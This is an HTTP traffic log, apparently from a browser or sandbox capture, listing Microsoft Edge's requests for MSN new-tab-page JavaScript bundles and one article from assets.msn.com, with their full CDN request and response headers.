akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b94af2
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/ms-rewards-wc.e3c2ca149f1a9e509b34.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/ms-rewards-wc.e3c2ca149f1a9e509b34.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: BW3Ob+3oZFd6542tubN6rA==
last-modified: Fri, 16 Dec 2022 21:57:06 GMT
etag: 0x8DADFB079264F45
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c00aec0d-001e-0084-460c-14f6c5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:15 GMT
akamai-request-bc: [a=88.221.24.111,b=431573779,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=30, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b94b13
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/outlook-email-preview-wc.8c0031a31a14c719ff51.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/outlook-email-preview-wc.8c0031a31a14c719ff51.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: o3OrUKZrhsA4CoTDgj93Fw==
last-modified: Fri, 16 Dec 2022 21:57:07 GMT
etag: 0x8DADFB079DC3E30
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 157679f2-601e-0052-24ee-1338af000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:15 GMT
akamai-request-bc: [a=88.221.24.111,b=431573955,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=26, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b94bc3
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/mobile-app-upsell.e972e8da27c983f445e1.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/mobile-app-upsell.e972e8da27c983f445e1.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: p5buBjhg3yzyA+JJfTSezA==
last-modified: Tue, 20 Dec 2022 05:42:20 GMT
etag: 0x8DAE24CF68486D4
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 621f632d-901e-0001-5c5a-14269a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:15 GMT
akamai-request-bc: [a=88.221.24.111,b=431573953,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=26, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b94bc1
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/feed-toggle-wc.9e09a65888cbbf646c3b.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/feed-toggle-wc.9e09a65888cbbf646c3b.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 9KvxtxIdPrpTDHMKAGd8lw==
last-modified: Fri, 16 Dec 2022 21:57:07 GMT
etag: 0x8DADFB079BD971A
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 076be8b5-b01e-00ab-1796-13eee9000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:15 GMT
akamai-request-bc: [a=88.221.24.111,b=431573954,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=26, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b94bc2
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
Remote address:88.221.24.115:443RequestGET /breakingnews/v1/cms/api/amp/article/AA430z6 HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 95Co5C+eF75DxGmBy94lJg==
last-modified: Tue, 20 Dec 2022 05:42:20 GMT
etag: 0x8DAE24CF6A5ECA5
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 268864d0-c01e-0020-385c-149cab000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:15 GMT
akamai-request-bc: [a=88.221.24.111,b=431574048,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=18, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b94c20
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/CoachmarkData.4b820d591661c69411df.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/CoachmarkData.4b820d591661c69411df.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
last-modified: Mon, 07 Nov 2022 14:51:49 GMT
etag: W/"1889"
server: Microsoft-HTTPAPI/2.0
x-cms-documentstoragetier: Cache
x-cms-documentid: AA430z6
x-cms-version: 669
x-cms-state: Published
x-cms-tenant: amp
x-cms-type: article
x-cms-executiontimeinmilliseconds: 0
access-control-allow-origin: https://ntp.msn.com
access-control-expose-headers: X-Trace-Context,X-CMS-DocumentId,X-CMS-Type,X-CMS-Tenant,X-CMS-State,X-CMS-Version,ETag,X-CMS-SearchElapsedTimeInMilliseconds,X-CMS-SearchBackendTimeInMilliseconds,X-CMS-SearchMatchedTotal,X-CMS-SearchMaxScore,X-CMS-SearchShardsTotal,X-CMS-SearchShardsSuccessful,X-CMS-SearchShardsFailed,X-CMS-SearchReturnedCount,X-CMS-ExecutionTimeInMilliseconds,MS-CV
appex-activity-id: aa2b3a1f-c1e8-44c3-8aea-a468c9178967
x-trace-context: {"ActivityId":"aa2b3a1f-c1e8-44c3-8aea-a468c9178967"}
ms-cv: UvcQyzSEWkyy8tUNslA4eg.0
x-cms-servicelocation: eastus:0
content-encoding: gzip
date: Sat, 31 Dec 2022 00:06:15 GMT
content-length: 1269
akamai-request-bc: [a=88.221.24.111,b=431574047,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=18, clienttt; dur=1, origin; dur=0 , cdntime; dur=1
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b94c1f
cache-control: max-age=30
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/layout-toggle.521098bde0a4006e7f9d.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/layout-toggle.521098bde0a4006e7f9d.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: I7QUceUyEtL6m+DR0KNASQ==
last-modified: Fri, 16 Dec 2022 21:57:05 GMT
etag: 0x8DADFB078AA2C9B
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 89191aba-b01e-00ab-14d1-13eee9000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:15 GMT
akamai-request-bc: [a=88.221.24.111,b=431574083,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=20, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b94c43
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/pill-wc.773c446bd0bf78402bfd.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/pill-wc.773c446bd0bf78402bfd.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: PSjY9eqMnLathllDx1WNaw==
last-modified: Tue, 20 Dec 2022 05:42:20 GMT
etag: 0x8DAE24CF64C680A
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a990c9ce-301e-00cb-195a-14accb000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:15 GMT
akamai-request-bc: [a=88.221.24.111,b=431574125,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b94c6d
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/RewardsData.7fe3143f20fa27579f6c.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/RewardsData.7fe3143f20fa27579f6c.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: BtB+swn3itpO+EIppTUiSQ==
last-modified: Fri, 16 Dec 2022 21:57:06 GMT
etag: 0x8DADFB0793715AE
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9bd54ca3-001e-00a8-7199-1393ef000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:15 GMT
akamai-request-bc: [a=88.221.24.111,b=431574264,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=26, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b94cf8
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/RewardsCoachmarkData.33cccbe27d4bdbd24132.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/RewardsCoachmarkData.33cccbe27d4bdbd24132.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: j6qyOiwyT+Js218lQc58sg==
last-modified: Fri, 16 Dec 2022 21:57:09 GMT
etag: 0x8DADFB07AC56A9E
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5ca02064-e01e-001e-4a0c-141fa7000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:15 GMT
akamai-request-bc: [a=88.221.24.111,b=431574263,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=26, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b94cf7
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/ocvFeedback.1a51892213fa4b659115.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/ocvFeedback.1a51892213fa4b659115.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: Zt9QKFm/zk1uiNI7Nwck2A==
last-modified: Tue, 20 Dec 2022 05:42:20 GMT
etag: 0x8DAE24CF6A06F2D
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3b6f69a7-901e-0079-2f5a-148c8b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:15 GMT
akamai-request-bc: [a=88.221.24.111,b=431574380,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=23, clienttt; dur=1, origin; dur=0 , cdntime; dur=1
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b94d6c
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/cold-start-gif.05ea6cc30c2f0977775a.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/cold-start-gif.05ea6cc30c2f0977775a.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: q3meCg+iZN+ZOArpUtvPQA==
last-modified: Fri, 16 Dec 2022 21:57:05 GMT
etag: 0x8DADFB0786390F6
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5a98ff38-701e-0077-4200-142e96000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:15 GMT
akamai-request-bc: [a=88.221.24.111,b=431574377,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=23, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b94d69
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/libs_esports_dist_index_js.33af26803714838c83b1.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/libs_esports_dist_index_js.33af26803714838c83b1.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: a22o3O1W1NwZhQQ8LGmOJg==
last-modified: Fri, 16 Dec 2022 21:57:09 GMT
etag: 0x8DADFB07AA5161A
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b01d267d-a01e-00a2-5e02-139dfa000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:15 GMT
akamai-request-bc: [a=88.221.24.111,b=431574378,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=23, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b94d6a
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/toast-wc.712ac4c4657e9e316587.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/toast-wc.712ac4c4657e9e316587.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: gMpzioWje/u3wGtjt8ec8A==
last-modified: Tue, 20 Dec 2022 05:42:20 GMT
etag: 0x8DAE24CF6425767
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 417cd33d-e01e-0076-085d-140594000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:15 GMT
akamai-request-bc: [a=88.221.24.111,b=431574379,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=23, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b94d6b
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/weather-data-lazy-services.eb2ed0225efab053ef95.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/weather-data-lazy-services.eb2ed0225efab053ef95.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 1otRctvl8cmW7KLqlNPQAw==
last-modified: Tue, 20 Dec 2022 05:42:19 GMT
etag: 0x8DAE24CF5B7DEE9
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2fe5d038-a01e-00f6-195a-1452c1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:15 GMT
akamai-request-bc: [a=88.221.24.111,b=431574503,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=21, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b94de7
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
